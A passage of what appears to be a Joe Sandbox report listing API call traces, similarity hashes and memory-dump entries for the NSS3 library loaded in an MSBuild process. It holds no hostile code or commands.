                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C688706
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000018,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004,?), ref: 6C688656
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000008,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004,?), ref: 6C688763
                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,6C688A20,?,?,00000000,6C687310,00000004,00000000,?,6C688A20,00000004,00000000,6C687310,?,?,00000004), ref: 6C688795
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_$CopyGrow_Item_Value$AllocateCriticalEnterSectionUnlockmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1239214001-0
                                                                                        APIs
                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC35
                                                                                          • Part of subcall function 6C6ACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6ACF16
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC55
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E,?,?), ref: 6C6CAC70
                                                                                          • Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE33C
                                                                                          • Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE350
                                                                                          • Part of subcall function 6C6AE300: PR_Unlock.NSS3(?), ref: 6C6AE5BC
                                                                                          • Part of subcall function 6C6AE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C6AE5CA
                                                                                          • Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE5F2
                                                                                          • Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE606
                                                                                          • Part of subcall function 6C6AE300: PORT_Alloc_Util.NSS3(?), ref: 6C6AE613
                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6CAC92
                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E), ref: 6C6CACD7
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6CAD10
                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C6CAD2B
                                                                                          • Part of subcall function 6C6AF360: TlsGetValue.KERNEL32(00000000,?,6C6CA904,?), ref: 6C6AF38B
                                                                                          • Part of subcall function 6C6AF360: EnterCriticalSection.KERNEL32(?,?,?,6C6CA904,?), ref: 6C6AF3A0
                                                                                          • Part of subcall function 6C6AF360: PR_Unlock.NSS3(?,?,?,?,6C6CA904,?), ref: 6C6AF3D3
                                                                                        Similarity
                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2926855110-0
                                                                                        APIs
                                                                                        • PR_Now.NSS3 ref: 6C6A8C7C
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A8CB0
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A8CD1
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6A8CE5
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A8D2E
                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C6A8D62
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A8D93
                                                                                        Similarity
                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                        • String ID:
                                                                                        • API String ID: 3131193014-0
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8585
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C859A
                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C7AD8C4,6C6C95D0,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85CC
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85E1
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?), ref: 6C6C85F4
                                                                                        Similarity
                                                                                        • API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
                                                                                        • String ID:
                                                                                        • API String ID: 738345241-0
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6945B5
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C6945C9
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6945E6
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6945F8
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C694647
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7AA0F4,?), ref: 6C69468C
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6946A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1594507116-0
                                                                                        • Opcode ID: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
                                                                                        • Instruction ID: 81b1f8c954b8c1dd67d198c75db775887599e5dfc6ffe412995a81d8a2e100ff
                                                                                        • Opcode Fuzzy Hash: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
                                                                                        • Instruction Fuzzy Hash: 1131D4B1A003155BFF104F68DC55BBB36A8AB46358F144039E914DF785EBB5D808C7AA
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C69E728,?,00000038,?,?,00000000), ref: 6C6A2E52
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A2E66
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A2E7B
                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C6A2E8F
                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C6A2E9E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2EAB
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2F0D
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                        • String ID:
                                                                                        • API String ID: 3106257965-0
                                                                                        • Opcode ID: d2be4fd0d01d626193aa871603735225b372815f6c7f1eaca63a8e8db1b601b2
                                                                                        • Instruction ID: 8387ab82afe539a56b8489aeee1eb52a1526626a41b4068e5c4f1e3234f2d515
                                                                                        • Opcode Fuzzy Hash: d2be4fd0d01d626193aa871603735225b372815f6c7f1eaca63a8e8db1b601b2
                                                                                        • Instruction Fuzzy Hash: 073146B6A40505ABEB005F69EC448A6B779FF0A359B048174EC0CC3A11FB31ECA5C7E4
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,?,6C697296,00000000), ref: 6C6D4487
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C697296,00000000), ref: 6C6D44A0
                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44BB
                                                                                        • SECMOD_DestroyModule.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44DA
                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,6C697296,00000000), ref: 6C6D4530
                                                                                        • free.MOZGLUE(?,?,?,?,?,6C697296,00000000), ref: 6C6D453C
                                                                                        • PORT_FreeArena_Util.NSS3 ref: 6C6D454F
                                                                                          • Part of subcall function 6C6BCAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C69B1EE,D958E836,?,6C6D51C5), ref: 6C6BCAFA
                                                                                          • Part of subcall function 6C6BCAA0: PR_UnloadLibrary.NSS3(?,6C6D51C5), ref: 6C6BCB09
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
                                                                                        • String ID:
                                                                                        • API String ID: 3590924995-0
                                                                                        • Opcode ID: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
                                                                                        • Instruction ID: 73bdee2eb0a837a541005823268db57bf23e324e93217448be045fce78997a7b
                                                                                        • Opcode Fuzzy Hash: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
                                                                                        • Instruction Fuzzy Hash: F3315CB4A04A019FDB00AF38C088669B7F0FF09319F020669D89997B00E771FC94CBC9
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C698C1B
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C698C34
                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C698C65
                                                                                        • PR_Unlock.NSS3 ref: 6C698C9C
                                                                                        • PR_Unlock.NSS3 ref: 6C698CB6
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                        • String ID: KRAM
                                                                                        • API String ID: 4127063985-3815160215
                                                                                        • Opcode ID: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
                                                                                        • Instruction ID: cd18f7683823401893ec913a4e604d078bc46979c038ae59dc60fc5550134b09
                                                                                        • Opcode Fuzzy Hash: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
                                                                                        • Instruction Fuzzy Hash: B02153B1605A02CFDB00AF78C484559BBF4FF49318F15896ED888CB711EB35E895CB99
                                                                                        APIs
                                                                                          • Part of subcall function 6C72A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72A415
                                                                                        • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C72A5AC
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C72A5BF
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5C8
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                          • Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                          • Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                          • Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5D9
                                                                                        • PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C72A5E8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
                                                                                        • String ID: *@
                                                                                        • API String ID: 2660593509-1483644743
                                                                                        • Opcode ID: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
                                                                                        • Instruction ID: 89f65dd739ad31155dc3d7a78e03b1383eab73ea72d5d3a646e9bacea5a35466
                                                                                        • Opcode Fuzzy Hash: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
                                                                                        • Instruction Fuzzy Hash: 352105B1D0020897C7009F2A9E0469FBBF4AF9972CF054228EC5863741EB74A6488BD7
                                                                                        APIs
                                                                                        • PR_EnterMonitor.NSS3 ref: 6C792CA0
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C792CBE
                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C792CD1
                                                                                        • strdup.MOZGLUE(?), ref: 6C792CE1
                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C792D27
                                                                                        Strings
                                                                                        • Loaded library %s (static lib), xrefs: 6C792D22
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                        • String ID: Loaded library %s (static lib)
                                                                                        • API String ID: 3511436785-2186981405
                                                                                        • Opcode ID: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
                                                                                        • Instruction ID: f8a22ee0489480c3c7c0c7612c278c98660c5a10e00b7635a4fc64a20b1b8632
                                                                                        • Opcode Fuzzy Hash: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
                                                                                        • Instruction Fuzzy Hash: AF11EBB67012009FEB509F15EA4966677B4EB4A31DF14853DDC09C7B52DB31E808CBA1
                                                                                        APIs
                                                                                        • DeleteCriticalSection.KERNEL32(6C6FC89B,FFFFFE80,?,6C6FC89B), ref: 6C71058B
                                                                                        • free.MOZGLUE(?,?,6C6FC89B), ref: 6C710592
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105AE
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105C2
                                                                                        • DeleteCriticalSection.KERNEL32(6C6FC89B,?,6C6FC89B), ref: 6C7105D8
                                                                                        • free.MOZGLUE(?,?,6C6FC89B), ref: 6C7105DF
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,6C6FC89B), ref: 6C7105FB
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Similarity
                                                                                        • API ID: Error$CriticalDeleteSectionfree$Value
                                                                                        • String ID:
                                                                                        • API String ID: 1757055810-0
                                                                                        • Opcode ID: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
                                                                                        • Instruction ID: b842d13b0abc55a391537ddf8dcb463a4a7f8834ff94c831afa3db87062726f4
                                                                                        • Opcode Fuzzy Hash: e5c7436614e6394e3b29e7745c5e5360ef50c6d90cad1f295955a1f91b35069d
                                                                                        • Instruction Fuzzy Hash: D501FC72B096A15BFF20AFA49E0DB493B787B1E71AF580034E50656F40DF64A1288795
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C723046
                                                                                          • Part of subcall function 6C70EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70EE85
                                                                                        • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C6F7FFB), ref: 6C72312A
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C723154
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C722E8B
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                          • Part of subcall function 6C70F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C6F9BFF,?,00000000,00000000), ref: 6C70F134
                                                                                        • memcpy.VCRUNTIME140(8B3C75C0,?,6C6F7FFA), ref: 6C722EA4
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72317B
                                                                                        Similarity
                                                                                        • API ID: Error$memcpy$K11_Value
                                                                                        APIs
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6EED6B
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6EEDCE
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,6C6EB04F), ref: 6C6EEE46
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6EEECA
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6EEEEA
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6EEEFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                        APIs
                                                                                          • Part of subcall function 6C6EC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6EDAE2,?), ref: 6C6EC6C2
                                                                                        • PR_Now.NSS3 ref: 6C6ECD35
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                          • Part of subcall function 6C6D6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C6ECD54
                                                                                          • Part of subcall function 6C749BF0: TlsGetValue.KERNEL32(?,?,?,6C790A75), ref: 6C749C07
                                                                                          • Part of subcall function 6C6D7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681CCC,00000000,00000000,?,?), ref: 6C6D729F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6ECD9B
                                                                                        • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6ECE0B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6ECE2C
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6ECE40
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaMark_Util.NSS3(?,6C6ECD93,?), ref: 6C6ECEEE
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ECD93,?), ref: 6C6ECEFC
                                                                                          • Part of subcall function 6C6ECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ECD93,?), ref: 6C6ECF0B
                                                                                          • Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ECD93,?), ref: 6C6ECF1D
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF47
                                                                                          • Part of subcall function 6C6ECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF67
                                                                                          • Part of subcall function 6C6ECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ECD93,?,?,?,?,?,?,?,?,?,?,?,6C6ECD93,?), ref: 6C6ECF78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,8B7874C0,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?), ref: 6C72267E
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?), ref: 6C72269D
                                                                                        • memcpy.VCRUNTIME140(00000000,8B7874C0,?,?,?,?,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?), ref: 6C7226AC
                                                                                        • PK11_AEADOp.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6F99E8), ref: 6C722714
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,?,?,?,6C6F99E8,00000000,00000000,?,?,?,?,?), ref: 6C722737
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C722750
                                                                                        Memory Dump Source
